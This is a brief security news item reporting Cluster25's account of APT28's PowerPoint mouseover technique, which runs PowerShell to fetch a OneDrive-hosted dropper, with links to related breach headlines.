PowerPoint Mouseover trick Used by Russian state sponsored hacking group, APT28 to infect systems with malware.
Cluster25 in a report said, the technique”is designed to be triggered when the user starts the presentation mode and moves the mouse.The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.”
The dropper is an image file that allows the malware to penetrate the victim’s system and download other software from Microsoft Graph API or OneDrive.
The dangerous malware can be planted as a link in a document which initiates from the Organisation for Economic Co-operation and Development (OECD)located in the country of France.
Cluster25 knows that these attacks are still going strong because the hackers have been using their URLs for two months.The cybersecurity firm said the actors of the operation will likely be targeting entities and individuals in the defence and government sectors of Europe and Eastern Europe.
The Graphite discovery is not the first time, according to Trellix in January 2022, the same attack chain was used to exploit MSHTML’s remote code execution (CVE-2021-40444) vulnerability to drop backdoors.
This development means that APT 28, which has been called “Fancy Bear,” is continuing their hacking methods. This latest variant was written in a way that exploits no longer work as often.
New NullMixer Malware Campaign Steals Users’ Payment Data and Credentials
Lazarus Hackers Target macOS Users Interested in Crypto Jobs
Optus Breach Hackers Release 10200 Customer Records in Extortion Scheme